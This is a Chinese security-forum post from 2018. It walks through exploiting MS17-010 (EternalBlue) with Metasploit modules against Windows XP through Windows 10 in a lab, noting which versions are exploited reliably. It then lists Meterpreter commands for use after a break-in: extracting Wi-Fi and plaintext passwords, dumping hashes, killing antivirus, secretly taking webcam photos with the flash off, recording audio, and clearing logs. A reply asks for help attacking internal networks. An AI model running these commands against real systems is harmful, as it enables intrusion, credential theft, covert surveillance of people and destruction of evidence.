首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]那些年,我们一起追过的“蓝”
发表于: 2018-3-12 17:34 3586

[原创]那些年,我们一起追过的“蓝”

cnsecurity 活跃值
2018-3-12 17:34
3586

那些年,我们一起追过的“蓝”

5ecurity团队成员publicmonkey(publicmonkey@5ecurity.cn)原创发布

目前MSF下利用ms17-010主要有以下三个模块:
1.exploit/windows/smb/enternalblue_doublepulsar
下载地址:de4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6q4L8r3g2$3k6h3&6b7j5i4c8Z5M7#2)9J5c8V1g2@1k6i4u0F1j5h3I4T1L8s2g2W2i4K6u0V1c8r3!0#2j5X3I4W2M7s2g2D9M7$3q4J5i4K6u0V1e0h3g2@1j5i4y4H3L8r3!0A6N6l9`.`.
2.kali官方最早支持的exploit/windows/smb/ms17_010_eternalblue模块
3.最近更新的exploit/windows/smb/ms17_010_psexec模块
下载地址:2f0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6J5j5i4m8A6k6o6N6Q4x3V1k6E0k6i4c8S2M7%4m8D9L8$3W2@1i4K6u0V1k6Y4u0S2L8h3g2%4L8%4u0C8i4K6u0r3M7s2g2D9L8q4)9J5c8U0V1@1y4K6x3`.
本次主要分析exploit/windows/smb/ms17_010_psexec模块,周更新kali已纳入此模块

1.安装与测试

kali2.0及以下版本需安装该模块(或下载最新版msf)

 

1.png

 

此处应注意安装其他四个依赖模块,reload_all不报错即可。
操作如下:

 

2.png

1.1.测试Microsoft(R) Windows(R) Server 2003, Enterprise Edition(ip: 192.168.253.141)

3.png

 

4.png

 

此版本在多次测试中稳定利用,此处不再赘述。

1.2. 测试Microsoft Windows XP Professional(ip: 192.168.253.136)

5.png

 

6.png

 

7.png

 

此版本在多次测试中稳定利用,此处也不再赘述。

1.3. 测试Microsoft Windows 7 家庭普通版(ip: 192.168.253.135)

8.png

 

当前模块需指定SMBPass和SMBUser建立window命名管道。

1.3.1.Win7使用exploit/windows/smb/ms17_010_eternalblue模块可被稳定利用

9.png

 

10.png

1.4.测试Microsoft Windows Server 2008 R2 Datacenter(ip: 192.168.253.135)

11.png

 

12.png

 

需指定SMBPass和SMBUser建立window命名管道。

1.4.1.使用exploit/windows/smb/ms17_010_eternalblue模块,部分winserver2008可被稳定利用,多次实际测试中发现winserver2008企业版利用不稳定,易导致蓝屏重启。

1.5.测试Windows 8.1 Pro 9600|Windows 8.1 Pro 6.3(ip: 10.0.21.160)

13.png

 

14.png

 

目前发现Windows 8.1 Pro 9600可以稳定利用,较高版本需要建立windows命名管道。

1.6.测试winserver2012(ip: 192.168.253.146)

15.png

 

16.png

 

需指定SMBPass和SMBUser建立window命名管道。

1.7.测试win10(ip: 192.168.253.145)

17.png

 

18.png

 

部分老版本稳定利用,较新版本需指定SMBPass和SMBUser建立window命名管道。
测试中发现Windows 10 Home 10586版本无需建立windows命名管道稳定利用,测试如下:

 

19.png

 

20.png

2.分享几条好玩的命令:

测试机为一台windows7 X64旗舰版未更新到最新的补丁

 

11111.jpg

 

bgrun post/windows/wlan/wlan_profile //读取无线连接的账号密码

 

22.png

 

此处执行失败换一种方式

 

在cmdshell下执行netsh wlan show profiles

 

23.png

 

24.png

 

wdigest //抓取明文密码(需加载mimikatz模块)

 

25.png

 

bgrun killav //杀掉杀毒软件

 

26.png

 

webcam_list //查看有没有摄像头

 

27.png

 

bgrun webcam //启动摄像头

 

28.png

 

webcam_snap -i 1 -v false //启动摄像头拍摄一张照片但不打开闪光灯

 

29.png

 

bgrun sound_recorder //启动声音录制

 

30.png

 

bgrun hashdump //获取哈希值

 

31.png

 

bgrun vnc //启动vnc连接

 

32.png

 

screenshot //对目标系统桌面进行截屏

 

33.png

 

clearev //清除日志

 

34.png

原文链接 aa8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0g2W2j5%4g2J5K9i4c8&6i4K6u0W2j5$3&6Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9J5c8X3q4J5j5$3S2A6N6X3g2K6i4K6u0r3y4e0c8Q4x3V1j5`.


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
JackCTLers
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
写的挺不错,赞一个,MS010虽然已经很久了,但是还是有很多内网的机器还是没有补,毕竟内网相对于安全一点,我现在遇到了一个关于内网如何利用MSF攻击的问题,如果大佬愿意指点我请回复
2018-3-16 11:58
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回